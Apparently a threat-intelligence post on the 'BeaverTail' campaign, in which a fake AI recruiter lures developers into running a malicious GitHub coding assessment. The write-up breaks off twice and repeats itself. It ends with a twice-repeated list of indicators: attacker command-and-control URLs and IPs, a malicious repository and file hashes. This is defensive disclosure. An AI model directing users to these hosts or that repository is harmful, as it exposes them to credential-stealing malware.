How a fake AI recruiter delivers five staged malware disguised as a dream job
Contents
Featured
How a fake AI recruiter delivers five staged malware disguised as a dream job
Overview
It starts like every developer’s favourite notification:
“You’ve been shortlisted for an AI engineering role.”
The company looks exciting - DLMind, an “AI-driven innovation lab.” The recruiter seems legit - Tim Morenc, CEDS, with a polished LinkedIn profile, professional tone, and a history of mutual connections.
But behind that friendly message lies BeaverTail - a malicious campaign engineered to hijack your curiosity, your code, and your credentials.
The Hook
Developers receive LinkedIn messages offering a lucrative remote position titled “Innovative AI Engineer.” The attacker, posing as Tim Morenc, invites them to collaborate on a private GitHub repository supposedly containing a coding assessment. The instructions are simple:
“Clone the repo, review the code, run the setup, and share your feedback.”
And that’s exactly what triggers the trap.
The Bite
The moment the provided script executes, it unfurls a five-staged payload - a meticulously crafted attack chain designed …
How a fake AI recruiter delivers five staged malware disguised as a dream job
Overview
It starts like every developer’s favourite notification:
“You’ve been shortlisted for an AI engineering role.”
The company looks exciting - DLMind, an “AI-driven innovation lab.” The recruiter seems legit - Tim Morenc, CEDS, with a polished LinkedIn profile, professional tone, and a history of mutual connections.
But behind that friendly message lies BeaverTail - a malicious campaign engineered to hijack your curiosity, your code, and your credentials.
The Hook
Developers receive LinkedIn messages offering a lucrative remote position titled “Innovative AI Engineer.” The attacker, posing as Tim Morenc, invites them to collaborate on a private GitHub repository supposedly containing a coding assessment. The instructions are simple:
“Clone the repo, review the code, run the setup, and share your feedback.”
And that’s exactly what triggers the trap.
The Bite
The moment the provided script executes, it unfurls a five-staged payload - a meticulously crafted attack chain designed …
IoC
http://api.npoint.io/96979650f5739bcbaebb
http://172.86.89.10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e
https://github.com/dlmind-tech/AI-Healthcare.git
http://88.218.0.78:1224
http://88.218.0.78:2243
http://88.218.0.78
http://loopsoft.tech
http://ip-api.com
http://88.218.0.78:2243/
http://172.86.89.10:4382/api/service/makelog
http://95.164.17.24:1224
http://88.218.0.78:1224/client/3/603
http://172.86.89.10:4382/
https://deobfuscate.relative.im
http://172.86.89.10:4382/upload
http://88.218.0.78:1224/brow/3/603
http://95.164.17.24:1224/keys
https://github.com/dlmind-tech/AI-Healthcare
http://95.164.17.24
http://api.npoint.io
http://88.218.0.78:1224/adc/3
http://88.218.0.78:1224/pdown
http://loopsoft.tech:6168/defy/v8
http://95.164.17.24:1224/any
http://88.218.0.78:1224/uploads
http://172.86.89.10
http://172.86.89.10:4382
http://88.218.0.78:1224/keys
http://88.218.0.78:1224/payload/3/603
88.218.0.78
95.164.17.24
172.86.89.10
ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e
b59187e77c19f5fcd9fdb14663fbdd91cf7110bfec1267676a61b5a85583bf58
3e5fd7fdc21c6cfd419cc84fa67b869e
99502507bfa92aee6d6b0220346410412be6cfd1ca1b28378b9e0958bd697342
967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d
006c6a04a741ba75e66d460b441c8984bad00c2566b262a9b579a86c649e788f
351535afd2d98b9a3a0e14905a60a345
e43673a2a77ed68fa6e8074167350f8f
9daa4de89ea95bf5f7f97815ecee0d7435f03b1d50ff2222973bcc517daee160
http://172.86.89.10:4382/api/service/process/3e5fd7fdc21c6cfd419cc84fa67b869e
https://github.com/dlmind-tech/AI-Healthcare.git
http://88.218.0.78:1224
http://88.218.0.78:2243
http://88.218.0.78
http://loopsoft.tech
http://ip-api.com
http://88.218.0.78:2243/
http://172.86.89.10:4382/api/service/makelog
http://95.164.17.24:1224
http://88.218.0.78:1224/client/3/603
http://172.86.89.10:4382/
https://deobfuscate.relative.im
http://172.86.89.10:4382/upload
http://88.218.0.78:1224/brow/3/603
http://95.164.17.24:1224/keys
https://github.com/dlmind-tech/AI-Healthcare
http://95.164.17.24
http://api.npoint.io
http://88.218.0.78:1224/adc/3
http://88.218.0.78:1224/pdown
http://loopsoft.tech:6168/defy/v8
http://95.164.17.24:1224/any
http://88.218.0.78:1224/uploads
http://172.86.89.10
http://172.86.89.10:4382
http://88.218.0.78:1224/keys
http://88.218.0.78:1224/payload/3/603
88.218.0.78
95.164.17.24
172.86.89.10
ffed818b35b249db723741d3ec1cb7bc5a8e3e47821feb030d4a424717cd670e
b59187e77c19f5fcd9fdb14663fbdd91cf7110bfec1267676a61b5a85583bf58
3e5fd7fdc21c6cfd419cc84fa67b869e
99502507bfa92aee6d6b0220346410412be6cfd1ca1b28378b9e0958bd697342
967adedce518105664c46e21fd4edb02270506a307ea7242fa78c1cf80baec9d
006c6a04a741ba75e66d460b441c8984bad00c2566b262a9b579a86c649e788f
351535afd2d98b9a3a0e14905a60a345
e43673a2a77ed68fa6e8074167350f8f
9daa4de89ea95bf5f7f97815ecee0d7435f03b1d50ff2222973bcc517daee160